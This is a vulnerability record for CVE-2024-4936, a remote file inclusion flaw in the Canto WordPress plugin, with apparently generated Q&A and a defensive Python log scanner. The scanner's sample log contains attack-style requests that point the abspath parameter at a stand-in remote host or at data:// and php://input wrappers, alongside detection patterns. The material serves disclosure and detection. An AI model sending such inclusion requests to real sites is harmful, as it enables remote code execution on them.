Description

The Canto plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 3.0.8 via the abspath parameter. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. Exploitation requires allow_url_include to be enabled on the target site.

Classification

Assigner:

CWE:

Links
CPEs
  • canto wordpress_plugin 3.0.8

CVSS

CVSS version: 3.1
Base score: 9.8
Base severity: CRITICAL
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability score: 3.9
Impact score: 5.9

Can you explain the CVE description?

This CVE description is for a vulnerability identified as CVE-2024-4936 in the Canto plugin for WordPress. The vulnerability allows for Remote File Inclusion in all versions up to and including 3.0.8 via the abspath parameter. This vulnerability can be exploited by unauthenticated attackers to include remote files on the server, potentially leading to code execution. The exploit requires that allow_url_include is enabled on the target site. The CVSS score for this vulnerability is 9.8, indicating a critical severity level. The vulnerability was published on June 14, 2024, and is currently in an EARLY_WARNING status. The exploitability score is 3.9 and the impact score is 5.9. For more information, you can refer to the provided URLs for details on the vulnerability and potential mitigation steps.

How can this vulnerability be part of an attack tree?

This vulnerability can be part of an attack tree by allowing an attacker to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress. The attacker can craft a malicious request with the abspath parameter pointing to a remote file containing malicious code. If the target site has allow_url_include enabled, the attacker can trigger the inclusion of the remote file on the server, leading to code execution. This can be used as a stepping stone for further attacks, such as gaining unauthorized access to sensitive data, installing backdoors, or escalating privileges on the target system.
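As an added example (not part of this record and not code from the Canto plugin), the following Python script shows the two checks a defender would run for this class of issue: it scans access-log lines for requests whose abspath parameter carries a URL stream-wrapper scheme that include() only opens when allow_url_include is On, and it checks a php.ini excerpt for that directive. The log lines, client addresses (RFC 5737 documentation ranges) and the endpoint path are constructed placeholders; the record does not name the vulnerable endpoint, so ENDPOINT_PLACEHOLDER.php stands in for it.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/Nginx "combined" access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Stream-wrapper schemes that include()/require() will only open when
# allow_url_include=On (http, https, ftp, ftps, data, php://input).  Any php://
# value is flagged for review.  A plain local path has no scheme and passes.
URL_INCLUDE_SCHEMES = {"http", "https", "ftp", "ftps", "data", "php"}


def classify_abspath(value: str):
    """Return 'rfi:<scheme>' if an abspath value names a URL wrapper, else None."""
    # parse_qs already decoded the value once; decode again so a double-encoded
    # value such as https%253A%252F%252F... is still recognised.
    decoded = unquote(value).strip()
    scheme = urlsplit(decoded).scheme.lower()
    if scheme in URL_INCLUDE_SCHEMES:
        return f"rfi:{scheme}"
    return None


def find_inclusion_attempts(log_text: str):
    """Scan access-log text and return one dict per suspicious abspath value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for value in parse_qs(query, keep_blank_values=True).get("abspath", []):
            reason = classify_abspath(value)
            if reason:
                hits.append({
                    "client": m["client"],
                    "ts": m["ts"],
                    "status": int(m["status"]),
                    "abspath": value,
                    "reason": reason,
                })
    return hits


_TRUE_VALUES = {"1", "on", "yes", "true"}


def allow_url_include_enabled(php_ini_text: str) -> bool:
    """Check a php.ini excerpt for allow_url_include (last assignment wins; default Off)."""
    enabled = False
    for line in php_ini_text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop ; comments
        m = re.match(r'allow_url_include\s*=\s*"?([^"\s]*)"?', line, re.I)
        if m:
            enabled = m.group(1).lower() in _TRUE_VALUES
    return enabled


# Constructed sample data (documentation IPs, placeholder endpoint): not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jun/2024:10:01:02 +0000] "GET /wp-content/plugins/canto/ENDPOINT_PLACEHOLDER.php?abspath=http://198.51.100.7/remote.txt HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.9 - - [14/Jun/2024:10:01:05 +0000] "GET /wp-content/plugins/canto/ENDPOINT_PLACEHOLDER.php?abspath=/var/www/html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Jun/2024:10:01:09 +0000] "GET /wp-content/plugins/canto/ENDPOINT_PLACEHOLDER.php?abspath=https%253A%252F%252F198.51.100.7%252Fremote.txt HTTP/1.1" 500 0 "-" "curl/8.0"
198.51.100.20 - - [14/Jun/2024:10:02:11 +0000] "GET /wp-content/plugins/canto/ENDPOINT_PLACEHOLDER.php?abspath=data://text/plain,hello HTTP/1.1" 200 12 "-" "python-requests/2.31"
198.51.100.20 - - [14/Jun/2024:10:02:15 +0000] "POST /wp-content/plugins/canto/ENDPOINT_PLACEHOLDER.php?abspath=php://input HTTP/1.1" 200 12 "-" "python-requests/2.31"
203.0.113.9 - - [14/Jun/2024:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Constructed php.ini excerpt showing the weak setting this CVE depends on.
SAMPLE_PHP_INI = """\
[PHP]
; default shipped value is Off; On is what makes the CVE exploitable
allow_url_fopen = On
allow_url_include = On   ; should be Off
"""

if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} {hit['reason']} "
              f"abspath={hit['abspath']!r} status={hit['status']}")
    print("allow_url_include enabled:", allow_url_include_enabled(SAMPLE_PHP_INI))
```

The log scan flags four of the six constructed lines (the plain local path and the unrelated login request pass), including the double-encoded URL and the data:// and php://input wrappers. The php.ini check is the companion mitigation: on a site still running 3.0.8 or earlier, setting allow_url_include to Off removes the precondition the record names, and updating the plugin removes the inclusion itself.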


Generated on: 2024-07-01